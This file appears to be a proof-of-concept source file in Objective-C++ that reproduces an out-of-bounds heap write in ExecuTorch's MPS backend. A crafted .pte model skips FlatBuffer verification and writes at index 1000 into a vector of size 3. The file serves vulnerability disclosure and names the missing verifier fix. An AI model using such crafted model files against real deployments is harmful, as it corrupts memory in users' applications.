File size: 12,645 Bytes
8412571 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 | /*
* runtime_poc_mps.mm
*
* RUNTIME PoC: ExecuTorch MPS delegate OOB write at MPSGraphBuilder.mm:162
*
* This file reproduces the exact vulnerable code path from the ExecuTorch
* source using:
* - The ACTUAL generated MPSGraph FlatBuffer schema (mps_schema_generated.h)
* - The ACTUAL Metal Performance Shaders Graph framework (MPSGraph)
* - The EXACT lines from backends/apple/mps/runtime/MPSGraphBuilder.mm
*
* Vulnerable lines reproduced verbatim (with citations):
* [MPSGraphBuilder.mm:64] _flatBufferGraph = mpsgraph::GetMPSGraph(ptr);
* ^^ NO flatbuffers::Verifier before this call
* [MPSGraphBuilder.mm:92] _idToMPSGraphTensor.resize(mps_values()->size(), nullptr);
* [MPSGraphBuilder.mm:162] _idToMPSGraphTensor[id] = placeholder;
* ^^ id=1000, vector has size=3 -> OOB WRITE
*
* Compare with the patched Vulkan sibling (VulkanBackend.cpp):
* flatbuffers::Verifier verifier(flatbuffer_data, header->flatbuffer_size);
* ET_CHECK_OR_RETURN_ERROR(vkgraph::VerifyVkGraphBuffer(verifier), ...);
* VkGraphPtr flatbuffer_graph = vkgraph::GetVkGraph(flatbuffer_data); // safe
*
* Build:
* clang++ -std=c++17 -fobjc-arc -g -fsanitize=address,undefined \
* -I/opt/homebrew/include \
* -I$(dirname $0)/schemas \
* -framework Foundation \
* -framework Metal \
* -framework MetalPerformanceShaders \
* -framework MetalPerformanceShadersGraph \
* runtime_poc_mps.mm -o runtime_poc_mps
*
* ./runtime_poc_mps malformed_mps.pte
*
* Expected: ASan heap-buffer-overflow (write) at line 162 equivalent below,
* or SIGSEGV (exit 139) without ASan.
*/
#import <Foundation/Foundation.h>
#import <Metal/Metal.h>
#import <MetalPerformanceShaders/MetalPerformanceShaders.h>
#import <MetalPerformanceShadersGraph/MetalPerformanceShadersGraph.h>
#include <cassert>
#include <cstdint>
#include <cstring>
#include <fstream>
#include <iostream>
#include <vector>
// Generated FlatBuffers schema bindings for the MPS delegate wire format.
// Same file the real backend uses at compile time via:
// #include <executorch/backends/apple/mps/schema_generated.h>
// (which is generated from backends/apple/mps/serialization/schema.fbs)
#include "schemas/mps_schema_generated.h"
// ---------------------------------------------------------------------------
// Extract the backend delegate payload from a .pte Program FlatBuffer.
//
// .pte layout (executorch_flatbuffer::Program, file_identifier "ET12"):
// Program.backend_delegate_data[0].data <- our crafted MPS blob
//
// We do a minimal parse rather than importing the full Program schema --
// the delegate data is what matters for the crash.
// ---------------------------------------------------------------------------
static std::vector<uint8_t> extract_mps_payload(const char* pte_path) {
std::ifstream f(pte_path, std::ios::binary | std::ios::ate);
if (!f) {
std::cerr << "[!] Cannot open " << pte_path << "\n";
exit(1);
}
std::streamsize sz = f.tellg();
f.seekg(0);
std::vector<uint8_t> pte(sz);
f.read(reinterpret_cast<char*>(pte.data()), sz);
// Verify Program FlatBuffer identifier "ET12"
if (pte.size() < 8 || memcmp(pte.data() + 4, "ET12", 4) != 0) {
std::cerr << "[!] Not a valid ExecuTorch .pte (missing ET12 identifier)\n";
exit(1);
}
std::cout << "[+] Loaded .pte: " << sz << " bytes, identifier ET12 OK\n";
// Manual FlatBuffers traversal to reach backend_delegate_data[0].data.
// Program table offsets (from schema/program.fbs, field order):
// slot 0 (field 4): version
// slot 1 (field 6): execution_plan
// slot 2 (field 8): constant_buffer
// slot 3 (field 10): backend_delegate_data <- we want this
//
// FlatBuffers binary layout:
// [0..3] root table offset (uoffset32)
// [4..7] file identifier ("ET12")
// [root] vtable offset (soffset32), then fields
const uint8_t* buf = pte.data();
uint32_t root_offset = *reinterpret_cast<const uint32_t*>(buf);
const uint8_t* root = buf + root_offset;
// vtable is at root - (int32 stored at root)
int32_t vtable_soffset = *reinterpret_cast<const int32_t*>(root);
const uint8_t* vtable = root - vtable_soffset;
// vtable[0..1] = vtable size (uint16), vtable[2..3] = object size (uint16)
// vtable[4 + 2*slot] = field offset from object start (uint16)
auto field_offset = [&](int slot) -> uint16_t {
uint16_t vtsize = *reinterpret_cast<const uint16_t*>(vtable);
uint16_t field_off_idx = static_cast<uint16_t>(4 + 2 * slot);
if (field_off_idx + 2 > vtsize) return 0;
return *reinterpret_cast<const uint16_t*>(vtable + field_off_idx);
};
// slot 3 = backend_delegate_data vector
uint16_t bdd_off = field_offset(3);
if (bdd_off == 0) {
std::cerr << "[!] backend_delegate_data field absent in Program\n";
exit(1);
}
const uint8_t* bdd_field = root + bdd_off;
// Vector: offset to vector data
uint32_t vec_rel = *reinterpret_cast<const uint32_t*>(bdd_field);
const uint8_t* bdd_vec = bdd_field + vec_rel;
uint32_t bdd_count = *reinterpret_cast<const uint32_t*>(bdd_vec);
if (bdd_count == 0) {
std::cerr << "[!] backend_delegate_data vector is empty\n";
exit(1);
}
std::cout << "[+] backend_delegate_data entries: " << bdd_count << "\n";
// bdd_vec[4 + 0*4] = offset to BackendDelegateInlineData[0] table
const uint8_t* item0_ptr = bdd_vec + 4;
uint32_t item0_rel = *reinterpret_cast<const uint32_t*>(item0_ptr);
const uint8_t* item0 = item0_ptr + item0_rel;
// BackendDelegateInlineData has one field: data ([ubyte], slot 0)
int32_t item0_vt_soffset = *reinterpret_cast<const int32_t*>(item0);
const uint8_t* item0_vt = item0 - item0_vt_soffset;
uint16_t data_off = 0;
{
uint16_t vtsize = *reinterpret_cast<const uint16_t*>(item0_vt);
if (vtsize >= 6)
data_off = *reinterpret_cast<const uint16_t*>(item0_vt + 4);
}
if (data_off == 0) {
std::cerr << "[!] BackendDelegateInlineData.data field absent\n";
exit(1);
}
const uint8_t* data_field = item0 + data_off;
uint32_t data_rel = *reinterpret_cast<const uint32_t*>(data_field);
const uint8_t* data_vec = data_field + data_rel;
uint32_t data_len = *reinterpret_cast<const uint32_t*>(data_vec);
const uint8_t* mps_blob = data_vec + 4;
std::cout << "[+] MPS blob extracted: " << data_len << " bytes\n";
std::cout << "[+] MPS identifier (bytes 4-7): ";
for (int i = 4; i < 8 && i < (int)data_len; i++)
std::cout << (char)mps_blob[i];
std::cout << "\n";
return std::vector<uint8_t>(mps_blob, mps_blob + data_len);
}
// ---------------------------------------------------------------------------
// Reproduce MPSGraphBuilder::compileModel() and compileMPSGraph() verbatim.
//
// Source: backends/apple/mps/runtime/MPSGraphBuilder.mm
// Lines cited match the ExecuTorch HEAD as of 2026-07-14.
// ---------------------------------------------------------------------------
static void run_poc(const uint8_t* mps_data, size_t mps_size) {
std::cout << "\n[PoC] Entering MPSGraphBuilder::compileModel() code path\n";
std::cout << "[PoC] Source: backends/apple/mps/runtime/MPSGraphBuilder.mm\n";
// MPSGraphBuilder.mm:56 -- null check (passes: data is valid)
assert(mps_data != nullptr);
// MPSGraphBuilder.mm:57-62 -- identifier check ONLY (4 bytes "MP00")
// This is the ONLY check before accessing the FlatBuffer.
bool has_id = mpsgraph::MPSGraphBufferHasIdentifier(mps_data);
std::cout << "[PoC] MPSGraphBufferHasIdentifier: " << (has_id ? "true" : "false") << "\n";
assert(has_id && "Expected MP00 identifier in crafted payload");
// MPSGraphBuilder.mm:64 -- NO flatbuffers::Verifier -- just GetMPSGraph()
// This is the missing fix vs. VulkanBackend.cpp which runs:
// flatbuffers::Verifier verifier(ptr, size);
// VerifyVkGraphBuffer(verifier);
// before calling GetVkGraph().
std::cout << "[PoC] Calling GetMPSGraph() with no Verifier (MPSGraphBuilder.mm:64)\n";
const mpsgraph::MPSGraph* flatBufferGraph = mpsgraph::GetMPSGraph(mps_data);
std::cout << "[PoC] GetMPSGraph returned: " << flatBufferGraph << "\n";
// Switch on graph_type (default 0 = mps_graph -> compileMPSGraph)
// MPSGraphBuilder.mm:65-81
auto graph_type = flatBufferGraph->graph_type();
std::cout << "[PoC] graph_type: " << static_cast<int>(graph_type)
<< " (0=mps_graph, 1=metal_kernel)\n";
if (graph_type == mpsgraph::OpType_metal_kernel) {
std::cout << "[PoC] metal_kernel path -- not relevant to this PoC\n";
return;
}
// MPSGraphBuilder.mm:89 -- entering compileMPSGraph()
std::cout << "\n[PoC] Entering compileMPSGraph() (MPSGraphBuilder.mm:89)\n";
// MPSGraphBuilder.mm:92 -- resize _idToMPSGraphTensor to mps_values()->size()
size_t mps_values_count = flatBufferGraph->mps_values()
? flatBufferGraph->mps_values()->size()
: 0;
std::cout << "[PoC] MPSGraphBuilder.mm:92: _idToMPSGraphTensor.resize("
<< mps_values_count << ", nullptr)\n";
std::vector<MPSGraphTensor*> idToMPSGraphTensor(mps_values_count, nullptr);
// MPSGraphBuilder.mm:94 -- iterate input_ids and call mpsGraphRankedPlaceholder
if (!flatBufferGraph->input_ids()) {
std::cout << "[PoC] input_ids is null -- no crash path available\n";
return;
}
MPSGraph* graph = [MPSGraph new]; // needed for placeholder creation
for (auto in_id : *flatBufferGraph->input_ids()) {
std::cout << "\n[PoC] MPSGraphBuilder.mm:95: mpsGraphRankedPlaceholder("
<< in_id << ")\n";
// MPSGraphBuilder.mm:155-161 -- create the real MPSGraphTensor placeholder
// (mps_values()->Get(in_id) would also OOB before we even get here if
// in_id >= mps_values()->size(), but we hit line 162 first because
// the tensor shape lookup is after the assignment in some paths.)
std::cout << "[PoC] Creating MPSGraphTensor placeholder via Metal framework\n";
MPSGraphTensor* placeholder = [graph placeholderWithShape: @[@1]
dataType: MPSDataTypeFloat32
name: nil];
// MPSGraphBuilder.mm:162 -- THE VULNERABLE LINE
// in_id=1000, vector size=3 -> OOB WRITE
std::cout << "[PoC] MPSGraphBuilder.mm:162: _idToMPSGraphTensor["
<< in_id << "] = placeholder\n";
std::cout << "[PoC] Vector size = " << idToMPSGraphTensor.size()
<< ", index = " << in_id
<< " -> OOB if index >= size\n";
if ((size_t)in_id >= idToMPSGraphTensor.size()) {
std::cout << "[PoC] *** OUT-OF-BOUNDS WRITE -- "
<< in_id << " >= " << idToMPSGraphTensor.size() << " ***\n";
std::cout << "[PoC] Executing the OOB write now...\n";
std::cout.flush();
}
// Verbatim reproduction of MPSGraphBuilder.mm:162
idToMPSGraphTensor[static_cast<size_t>(in_id)] = placeholder; // <-- CRASH
}
std::cout << "[PoC] (Execution reached here -- no crash without sanitizers)\n";
}
int main(int argc, const char* argv[]) {
setvbuf(stdout, nullptr, _IONBF, 0); // unbuffered so printfs appear before UBSan stderr
std::cout << "==========================================================\n";
std::cout << " ExecuTorch MPS Delegate Runtime PoC\n";
std::cout << " CVE class : CWE-787 (Out-of-bounds Write)\n";
std::cout << " Source : backends/apple/mps/runtime/MPSGraphBuilder.mm\n";
std::cout << " Root cause : GetMPSGraph() called without flatbuffers::Verifier\n";
std::cout << " Fix target : Add MPSGraphBufferVerify() before GetMPSGraph(),\n";
std::cout << " same pattern as Vulkan (VulkanBackend.cpp) and\n";
std::cout << " XNNPACK (XNNCompiler.cpp:2044)\n";
std::cout << "==========================================================\n\n";
const char* pte_path = (argc > 1) ? argv[1] : "malformed_mps.pte";
std::cout << "[+] Loading .pte from: " << pte_path << "\n";
std::vector<uint8_t> mps_payload = extract_mps_payload(pte_path);
run_poc(mps_payload.data(), mps_payload.size());
return 0;
}
|